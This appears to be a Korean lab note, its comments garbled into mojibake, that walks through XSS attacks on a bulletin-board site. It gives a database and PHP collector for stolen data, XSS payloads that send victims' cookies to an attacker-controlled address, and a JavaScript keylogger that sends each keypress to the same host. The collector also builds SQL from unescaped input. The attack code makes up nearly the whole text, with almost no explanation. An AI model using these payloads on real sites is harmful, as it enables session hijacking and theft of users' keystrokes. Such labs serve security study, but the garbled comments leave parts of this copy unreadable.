# ์ธ์
๊ฐ ๋ฐ์ ๋ฐ์ดํฐ ๋ฒ ์ด์ค ์์ฑ
CREATE database xss_attack;
USE xss_attack;
CREATE table session_list(
date date,
ip varchar(15),
session varchar(50)
);
# ์ธ์
๊ฐ ๋ฆฌ์คํธ ์์ฑ
<?php
$db_conn = new mysqli("127.0.0.1","root","apmsetup","xss_attack");
$session = $_GET["data"];
$remote_ip = $_SERVER["REMOTE_ADDR"];
if(!empty($session)){
$query = "insert into session_list values(now(), '{$remote_ip}', '$session')";
$db_conn->query($query);
}
?>
XSS ๊ณต๊ฒฉ ์ํ
# ip๋ถ๋ถ์ ์์ ์ ip ์
๋ ฅ
<script>location.href="http://192.168.0.114/session.php?data="+document.cookie</script>
<a href="http://192.168.0.114/xssboard/index.php?page=error&value=<script>new Image().src="http://192.168.0.114/session.php?data="+document.cookie</script>>๋ฐ๋ก๊ฐ๊ธฐ<a>
<script>new+Image().src%3d"http%3a//192.168.0.114/session.php%3fdata%3d"%2bdocument.cookie</script>
<a href="http://192.168.0.114/xssboard/index.php?page=error&value=<script>new+Image().src%3d"http%3a//192.168.0.114/session.php%3fdata%3d"%2bdocument.cookie</script>>๋ฐ๋ก๊ฐ๊ธฐ<a>
key Logging
๋๋ฅด๋ key๋ค์ ๋ฐ์ดํฐ๋ฒ ์ด์ค๋ก ๋ฐ์์จ๋ค
# keylogging
CREATE table key_logging(
date date,
ip varchar(15),
data text);
# key logging ์คํ ๊ตฌ๋ฌธ
<?php
$db_conn=new mysqli("127.0.0.1", "root", "apmsetup", "xss_attack");
$key = $db_conn->real_escape_string($_GET["data"]);
$remote_ip = $_SERVER["REMOTE_ADDR"];
if(!empty($key)){
$query = " SELECT * FROM key_logging where ip='{$remote_ip}'";
$tmp = $db_conn->query($query);
$cnt = $tmp->num_rows;
if($cnt==0){
$query="INSERT INTO key_logging VALUES(now(),'{$remote_ip}','{$key}')";
}else{
$query = "UPDATE key_logging SET data=concat(data,'{$key}') WHERE ip='{$remote_ip}'";
}
$db_conn->query($query);
}
$db_conn -> close();
?>
<script>document.onkeypress=function(a){
alert(a.key);
key=encodeURI(a.key);
if(key=="Enter"){
key="(E)";
}
new Image().src="http://192.168.0.114/keylogging.php?data="+key;
}
</script>
<script>document.onkeypress=function(a){alert(a.key); key=encodeURI(a.key); if(key=="Enter"){key="(E)";}new Image().src="http://192.168.0.114/keylogging.php?data="+key;}</script>